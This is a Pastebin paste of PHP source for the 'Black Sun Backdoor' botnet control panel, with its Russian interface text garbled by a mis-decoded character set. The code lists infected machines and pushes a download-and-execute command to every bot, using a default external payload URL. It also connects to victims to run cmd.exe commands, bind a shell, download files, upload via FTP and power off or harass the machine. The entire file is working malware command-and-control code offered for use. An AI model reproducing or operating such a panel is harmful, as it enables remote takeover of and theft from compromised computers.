Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- /*
- * ---------------------------------------------------------------------
- * ____ _ _ _____
- * | _ \| | | | / ____|
- * | |_) | | __ _ ___| | _| (___ _ _ _ __
- * | _ <| |/ _` |/ __| |/ /\___ \| | | | '_ \
- * | |_) | | (_| | (__| < ____) | |_| | | | |
- * |____/|_|\__,_|\___|_|\_\_____/ \__,_|_| |_|
- * Black Sun Backdoor v1.0 prebeta
- *
- * (x) Cytech 2007
- * ---------------------------------------------------------------------
- */
- ?>
- <title> BlackSun Remote Control System </title>
- <center><img src="images/logo.JPG"><br><br></center>
- <center>
- <table style="text-align: center; width: 959px; height: 32px; "border="0" cellpadding="0" cellspacing="0">
- <tbody>
- <tr>
- <small>
- <td><a href = "?act=connect"><img src="images/connect.jpg"><br>ïîäêëþ÷åíèå</a></td>
- <td><a href = "?act=stat"><img src="images/statistic.jpg"><br>ñòàòèñòèêà</a></td>
- </small>
- </tr>
- </tbody>
- </table>
- </center>
- <style>
- BODY {
- color: #DDDDDD;
- background-color: #000000;
- scrollbar-face-color: #212121;
- scrollbar-highlight-color: #404040;
- scrollbar-shadow-color: #000000;
- scrollbar-3dlight-color: #616161;
- scrollbar-arrow-color: #66E201;
- scrollbar-track-color: #000000;
- scrollbar-darkshadow-color: #000000;
- }
- .a {
- font-family: Verdana;
- font-size: 12px;}
- A {
- color: #00AA00;
- text-decoration: none;
- }
- A:hover {
- color: #FFFFFF;
- text-decoration: none;
- }
- TD {
- font-family: Verdana;
- font-size: 12px;
- color: #DDDDDD;
- }
- input
- {
- font-size: 10pt;font-family: Arial;
- color: #999930;
- background-color: #000000;
- border-color:#666666 #666666 #666666 #666666;
- border-width:1pt 1pt 1pt 1pt;
- border-style:dotted dotted dotted dotted;
- padding-left: 2pt;
- overflow:hidden;
- }
- select
- {
- font-size: 10pt;font-family: Arial;
- color: #999930;
- background-color: #000000;
- border-color:#666666 #666666 #666666 #666666;
- border-width:1pt 1pt 1pt 1pt;
- border-style:dotted dotted dotted dotted;
- padding-left: 2pt;
- overflow:hidden;
- }
- </style>
- <font style="font-family: Verdana;"><small>
- <?
- /**********************************************************/
- Error_Reporting(E_ALL & ~E_NOTICE);
- /**********************************************************/
- include("conf.php");
- /**********************************************************/
- function SendCommand($host, $port, $givemecmd)
- {
- $sock = fsockopen($host,$port,$errno,$errstr);
- if (!$sock)
- {
- echo "cant connect to remote server!";
- }
- else
- {
- fputs ($sock,$givemecmd);
- while (!feof($sock))
- {
- $ans = fgets($sock,999666);
- echo(htmlspecialchars($ans));
- }
- }
- fclose ($sock);
- }
- /**********************************************************/
- function ConnectMySQL($host, $login, $password, $database)
- {
- $connect=mysql_connect($host,$login,$password);
- if ($connect===FALSE)
- {
- die('cant connect to database');
- }
- $selectdb=mysql_select_db($database);
- if ($selectdb==FALSE)
- {
- die('cant select database');
- }
- }
- /**********************************************************/
- function ShowBotnetTable($db_botable)
- {
- echo '<br><br><b>[ Ñòàòèñòèêà: ]</b><br><br>';
- echo '<center>';
- echo '<table style="text-align: left; width: 912px; height: 80px;" border="1" cellpadding="0"';
- echo 'cellspacing="0"><tbody><tr>';
- echo '<td><center>Èìÿ êîìïüþòåðà</center></td>';
- echo '<td><center>Òåêóùàÿ HTTP-êîìàíäà</center></td>';
- echo '<td><center>IP-àäðåñ</center></td>';
- echo '<td><center>Backdoor-ïîðò</center></td>';
- echo '<td><center>Ïîñëåäíåå ïîäêëþ÷åíèå</center></td>';
- echo '<td><center>Äåéñòâèå</center></td>';
- echo '</tr>';
- $res = mysql_query("SELECT * FROM $db_botable");
- for ($i=0, $ROWS=mysql_num_rows($res); $i<$ROWS; $i++)
- {
- $row = mysql_fetch_assoc($res);
- echo '<tr>';
- foreach ($row as $key => $value)
- {
- if($key=="id") continue;
- #echo "<td>$value</td>";
- # äîáàâèòü ôèëüòðàöèþ!!!
- if($key=="uid")
- {
- $uid = $value;
- echo "<td>$value</td>";
- }
- if($key=="cmd")
- {
- $cmd=str_replace(""," ", $value); echo "<td>$cmd</td>";
- }
- if($key=="data")
- {
- $ip = $value;
- echo "<td>$ip</td>";
- }
- if($key=="port")
- {
- $port = $value;
- echo "<td>$port</td>";
- }
- if($key=="lconnection")
- {
- $lcon = $value;
- echo "<td>$lcon</td>";
- }
- }
- echo '<td><center><a href = "'; echo "?act=connect&ip=$ip&port=$port";
- echo '">ïîäêëþ÷èòüñÿ</a>';
- echo '<br><a href = "'; echo "?act=stat&bot=delete&uid=$uid";
- echo '">óäàëèòü</a></center></td>';
- echo '</tr>';
- }
- echo '</tbody></table></center>';
- }
- /**********************************************************/
- function SetNewCommandForBots($db_botable)
- {
- echo '<br><br><b>[ Óñòàíîâèòü êîìàíäó áîòàì: ]</b><br><br>';
- echo '<form action="" method="post">';
- echo 'Ââåäèòå èìÿ áîòà (ñèìâîë "*" - âñåì áîòàì ñðàçó)<br>';
- echo '<input name="botuid" size="10" value="*"><br>';
- # echo '<input name="newcmd" size="40" value="dexec_http://localhost/1.exe"><br>';
- # echo '<input name="set" value="óñòàíîâèòü" type="submit"><br><br>';
- echo 'Âûáåðèòå êîìàíäó äëÿ óñòàíîâêè<br>';
- echo '<SELECT name=newcmd>';
- echo '<OPTION value=dexec>Ñêà÷àòü è çàïóñòèòü ôàéë</OPTION>';
- echo '<OPTION value=nocommand>Óáðàòü êîìàíäó</OPTION>';
- echo '</SELECT><br>';
- echo 'Àðãóìåíò: <input name="arg1" size="50" value="http://nnp.0x48k.cc/load/bsun.exe"><br>';
- echo '<input name="set" value="óñòàíîâèòü" type="submit"><br><br>';
- echo '</form>';
- $newcmd = htmlspecialchars(addslashes($_POST['newcmd']."".$_POST['arg1']));
- $botuid = htmlspecialchars(addslashes($_POST['botuid']));
- if(!is_null($_POST['set'] && $_POST['botuid']))
- {
- if($botuid=="*")
- {
- mysql_query("UPDATE $db_botable SET cmd='$newcmd'"); // óñòàíàâëèâàåì
- }
- else
- {
- mysql_query("UPDATE $db_botable SET cmd='$newcmd' WHERE uid='$botuid'");
- }
- }
- }
- /**********************************************************/
- ConnectMySQL($db_host, $db_login, $db_password, $db_database);
- /**********************************************************/
- # http://gate/admin.php?act=stat
- if($_GET['act'] == "stat")
- {
- ShowBotnetTable($db_botable);
- SetNewCommandForBots($db_botable);
- # http://gate/admin.php?act=stat&bot=DELETE
- if($_GET['bot'] == "delete")
- {
- $duid = htmlspecialchars(addslashes($_GET['uid']));
- echo "<b>âû äåéñòâèòåëüíî õîòèòå óäàëèòü $duid ?</b>";
- echo '<form action="" method="post">';
- echo '<input name="submit" value="äà" type="submit"><br><br>';
- echo '</form><br><br>';
- if(!is_null($_POST['submit']))
- {
- mysql_query("DELETE FROM $db_botable WHERE uid = '$duid'");
- echo "<br><a href = ?act=stat>íàæìèòå ñþäà, åñëè âàø áðàóçåð íå ïîääåðæèâàåò àâòîìàòè÷åñêîãî ðåäèðåêòà</a><br>";
- echo '<script>location="?act=stat";</script>';
- }
- }
- }
- /**********************************************************/
- # http://gate/admin.php?act=connect
- if($_GET['act'] == "connect")
- {
- if(is_null($_GET['connect']))
- {
- $ip = htmlspecialchars(addslashes($_GET['ip']));
- $port = htmlspecialchars(addslashes($_GET['port']));
- echo '<center><br><br><b>[ Ïàðàìåòðû ïîäêëþ÷åíèÿ: ]</b><br>';
- echo '<form action="" method="post">';
- echo 'Õîñò: <input name="host" size="20" value="';
- if ($ip){ echo $ip; } else {echo '127.0.0.1';};
- echo '"><br><br>';
- echo 'Ïîðò: <input name="port" size="20" value="';
- if ($port){ echo $port; } else {echo '2121';};
- echo '"><br><br>';
- echo 'Ëîãèí: <input name="login" size="21" value="cytech"><br><br>';
- echo 'Ïàðîëü: <input name="password" size="20" value="cytech"><br><br>';
- echo '<input name="connect" value="Connect" type="submit"><br><br>';
- echo '</form>';
- if(!is_null($_POST['connect']))
- {
- $link = "?act=connect&connect=1&ip=".
- htmlspecialchars(addslashes($_POST[host])).
- "&port=".
- htmlspecialchars(addslashes($_POST[port])).
- "&login=".
- htmlspecialchars(addslashes($_POST[login])).
- "&password=".
- htmlspecialchars(addslashes($_POST[password]));
- echo "<br><a href = $link >íàæìèòå ñþäà, åñëè âàø áðàóçåð íå ïîääåðæèâàåò àâòîìàòè÷åñêîãî ðåäèðåêòà</a><br>";
- echo '<script>location="'.$link.'";</script>';
- }
- else
- {
- echo "<br>çàïîëíèòå âñå ïîëÿ ôîðìû<br>";
- }
- }
- # http://gate/admin.php?act=connect&connect=1
- if($_GET['connect'] == "1")
- {
- echo '<form action="" method="post">';
- echo '<br><br><b>[ Âûáåðèòå êîìàíäó äëÿ âûïîëíåíèÿ: ]</b>';
- echo '<br><SELECT name=cmd>';
- echo '<OPTION value=cmd>Âûïîëíåíèå êîìàíäû ÷åðåç cmd.exe [1]</OPTION>';
- echo '<OPTION value=exec>Ñêðûòûé/âèäèìûé çàïóñê ïðèëîæåíèÿ ÷åðåç WinExec [2]</OPTION>';
- echo '<OPTION value=bindshell>Çàáèíäèòü øåëë íà çàäàííîì ïîðòó [1]</OPTION>';
- echo '<OPTION value=download>Ñêà÷àòü ôàéë ïî HTTP [2]</OPTION>';
- echo '<OPTION value=ftp_upload>Çàêà÷àòü ôàéëà íà FTP [6]</OPTION>';
- echo '<OPTION value=->----------------------------------------------</OPTION>';
- echo '<OPTION value=msgbox>Âûâåñòè MessageBox [2]</OPTION>';
- echo '<OPTION value=power>Ïèòàíèå (âûêëþ÷èòü/ïåðåçàãðóçèòü/ñïàòü/âñòàòü) [1]</OPTION>';
- echo ' <OPTION value=monitor>Âêëþ÷èòü/âûêëþ÷èòü ìîíèòîð [1]</OPTION>';
- echo '<OPTION value=cdrom>Îòêðûòü/çàêðûòü CD-ROM [1]</OPTION>';
- echo '<OPTION value=keyboard>Ïåðåêëþ÷àòåëü ðåæèìîâ êëàâèàòóðû [1]</OPTION>';
- echo '<OPTION value=mouse>Ïîìåíÿòü ìûøü íà ëåâøó/ïðàâøó [1]</OPTION>';
- echo '<OPTION value=crazymouse>Ýôôåêò áåøåíîé ìûøè [2]</OPTION>';
- echo '<OPTION value=funwindows>Ñïðÿòàòü/ïîêàçàòü îêíà [1]</OPTION>';
- echo '<OPTION value=->----------------------------------------------</OPTION>';
- echo '<OPTION value=version>Ïîëó÷èòü óñòàíîâëåííóþ âåðñèþ BlackSun [0]</OPTION>';
- echo '<OPTION value=exitprocess>Çàêîí÷èòü ðàáîòó [0] </OPTION>';
- echo ' <OPTION value=killmyself>Ñàìîóíè÷òîæèòüñÿ (íåîáõîäèì ëîãèí è ïàðîëü)</OPTION>';
- echo '</SELECT>';
- echo ' <br><br><br>';
- echo ' Àðãóìåíò ¹1: <input name="arg1" size="50" value="netstat -an"><br>';
- echo ' Àðãóìåíò ¹2: <input name="arg2" size="50" value="_"><br>';
- echo ' Àðãóìåíò ¹3: <input name="arg3" size="50" value="_"><br>';
- echo ' Àðãóìåíò ¹4: <input name="arg4" size="50" value="_"><br>';
- echo ' Àðãóìåíò ¹5: <input name="arg5" size="50" value="_"><br>';
- echo ' Àðãóìåíò ¹6: <input name="arg6" size="50" value="_"><br>';
- echo ' <INPUT type="submit" name="submit" value="send command">';
- $login = $_GET['login'];
- $password = $_GET['password'];
- $cmd = $login.":".$password
- ."".$_POST['cmd']."".$_POST['arg1']."".$_POST['arg2']."".$_POST['arg3']
- ."".$_POST['arg4']."".$_POST['arg5']."".$_POST['arg6']."".$_POST['arg7'];
- echo '<br><br><b>[ Ðåçóëüòàò âûïîëíåíèÿ êîìàíäû: ]</b>';
- if(!is_null($_POST['submit']))
- {
- echo "</font><pre>";
- SendCommand($_GET['ip'], $_GET['port'], $cmd);
- echo "</pre>";
- }
- }
- }
- /**********************************************************/
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement